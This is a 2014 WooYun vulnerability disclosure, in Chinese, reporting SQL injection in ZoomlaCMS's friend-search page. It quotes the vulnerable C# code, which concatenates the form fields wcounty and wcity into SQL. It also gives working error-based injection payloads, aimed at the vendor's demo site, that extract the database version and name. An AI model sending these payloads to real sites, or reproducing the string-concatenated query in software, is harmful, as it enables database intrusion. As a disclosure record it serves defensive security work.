当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071168

漏洞标题:逐浪cms sql注入 一个文件 多个参数

相关厂商:逐浪CMS

漏洞作者: 路人甲

提交时间:2014-08-09 19:41

修复时间:2014-11-04 19:42

公开时间:2014-11-04 19:42

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-09: 细节已通知厂商并且等待厂商处理中
2014-08-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-10-08: 细节向核心白帽子及相关领域专家公开
2014-10-18: 细节向普通白帽子公开
2014-10-28: 细节向实习白帽子公开
2014-11-04: 细节向公众公开

简要描述:

逐浪cms最新版sql注入

详细说明:

逐浪最新版 sql注入
可以注册普通用户
访问

http://demo.zoomla.cn/User/Register.aspx


随便注册一个用户
test1234 密码123456
访问

http://demo.zoomla.cn/User/Login.aspx?ReturnUrl=


登录
访问

http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx


源码如下

protected void Page_Load(object sender, EventArgs e)
{
if (!base.IsPostBack)
{
string str = base.Request.Form["sex"];
string str2 = base.Request.Form["age1"];
string str3 = base.Request.Form["age2"];
string str4 = base.Request.Form["wcounty"]; //没处理
string str5 = base.Request.Form["wcity"]; //没处理
string wherex = "";
if (!string.IsNullOrEmpty(str))
{
if (str == "女生")
{
wherex = wherex + " and UserSex=0";
}
else if (str == "男生")
{
wherex = wherex + " and UserSex=1";
}
}
if (!string.IsNullOrEmpty(str2))
{
string str7 = DateTime.Now.AddYears(-Convert.ToInt32(str2)).ToShortDateString();
wherex = wherex + " and BirthDay<='" + str7 + "'";
}
if (!string.IsNullOrEmpty(str3))
{
string str8 = DateTime.Now.AddYears(-Convert.ToInt32(str3)).ToShortDateString();
wherex = wherex + " and BirthDay>='" + str8 + "'";
}
if (!string.IsNullOrEmpty(str4))
{
wherex = wherex + " and workProvince='" + str4 + "'"; //存在注入
if (!string.IsNullOrEmpty(str5))
{
wherex = wherex + " and workCity='" + str5 + "'"; //存在注入
}
}
this.ViewState["wherex"] = wherex;
if (!this.buser.CheckLogin())
{
if (SiteConfig.UserConfig.EnableCheckCodeOfLogin)
{
this.PhValCode.Visible = true;
}
else
{
this.PhValCode.Visible = false;
}
this.dwindow.Style["display"] = "";
}
else
{
DataTable dt = new DataTable();
dt = UserTableBLL.GetUsersInfo(wherex);
this.Bind(dt);
}
}
}


访问

http://demo.zoomla.cn/User\UserFriend\FriendSearch/Friend_quickSYResult.aspx


提交

sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT @@VERSION)>0 --


71.png


提交

sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT db_name())>0 --


72.png


漏洞证明:

漏洞证明如上

修复方案:

对参数进行处理吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-04 19:42

厂商回复:

最新状态:

暂无